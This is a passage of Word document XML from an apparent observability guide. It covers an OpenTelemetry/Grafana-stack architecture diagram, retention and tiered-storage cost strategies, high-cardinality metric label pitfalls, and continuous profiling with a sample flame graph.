      <w:r w:rsidRPr="007A2456">
        <w:t>│(Metrics)│    │ (Logs) │    │(Traces)│    │(Profiling)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2DABC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│         │    │        │    │        │    │                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE49C0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│Prometheus│    │Labels +│    │Trace ID│    │Continuous      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FEA26" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│compatible│    │Chunks  │    │ lookup │    │profiling       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26666B68" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│Long-term │    │in S3   │    │in S3   │    │(CPU, memory)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42332B38" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└────────┘    └────────┘    └────────┘    └────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400DC88A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD33956" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     │              │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B84F7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6938C0C9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│              OpenTelemetry Collector                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148BCAE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       Receives OTLP from all applications                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B3B00" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│       Routes: metrics→Mimir, logs→Loki, traces→Tempo        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78933607" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428CB23D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EA634" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">     │ OTLP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235ADCC7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD4877F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Applications (instrumented with OTel SDKs)                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475EFEBC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F45D8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Cost Optimization Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C073740" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF6C89" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Signal-specific retention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4553BF40" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Metrics: 13 months (for year-over-year comparison)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCE147" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Logs (ERROR): 90 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB3145" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Logs (DEBUG): 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045DDAB1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Traces: 14 days (sampled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B7BBD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Traces (errors): 30 days (100% kept)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE6C76C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="727D31D4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Downsampling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ED89AD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Raw metrics (15s resolution): keep 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC78ED5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  5-minute aggregation: keep 90 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BF6B2D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  1-hour aggregation: keep 13 months</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F8977" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="21C99E8E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Tiered storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED47F08" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Hot (last 24h): local SSD — fast queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A40C1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Warm (last 30d): networked storage — moderate speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3306B4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Cold (30d+): object storage (S3) — cheap, slower queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3394F205" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 High-Cardinality Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7415805B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EA1B64" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Problem: Metrics with high-cardinality labels explode storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B29C0BD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="3BD404C7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>BAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC81258" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_requests_total{user_id="...", session_id="...", request_id="..."}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4974A1D2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Millions of unique time series → Prometheus OOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70C5B1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="735CC6F4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>GOOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49496C8F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_requests_total{endpoint="/api/orders", method="POST", status="200"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D695C6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Thousands of unique series (bounded, known dimensions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633C8F04" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="25476E3D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>For high-cardinality debugging (specific user, specific request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405CCF36" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Use TRACES (high cardinality is fine — stored per-request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4386152C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Use LOGS (high cardinality fields are searchable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E70890" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  NOT metrics (metrics must be low cardinality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F402C0A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="5BE67085" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>The rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327785F2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Metrics: WHAT is happening system-wide (low cardinality, aggregated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A5069" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Traces/Logs: WHY it's happening for specific requests (high cardinality, per-event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB8829" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="019CD68F">
          <v:rect id="_x0000_i6140" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="703379B0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Beyond the Three Pillars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D04B41" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Profiling (Continuous Profiling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE3A8E6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED34071" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>What: CPU/memory/goroutine profiles collected continuously in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C2B6F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Why: "The service is using 80% CPU — WHERE in the code is time being spent?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB08E2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="7C908B7B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Tools: Pyroscope, Parca, Google Cloud Profiler, Datadog Continuous Profiler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043F587" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="5A2F2205" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Output (flame graph):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D38FBD2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  main()                                    </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>██████████████████████</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> 100%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21979B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> handleRequest()                       </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>████████████████████</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> 90%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1F9DD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  │   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> parseJSON()                       </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>████</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> 20%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B6422" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  │   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> validateInput()                   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>██</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> 10%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D45D2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  │   └── queryDatabase()                   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>██████████████</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> 60%  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>←</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> bottleneck!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C381E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  │       </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> prepareStatement()            </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>██</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> 10%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111C4E4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  │       └── executeQuery()               </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>████████████</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> 50%  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>←</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> most time here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BB5D15" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  └── serializeResponse()                   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>██</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
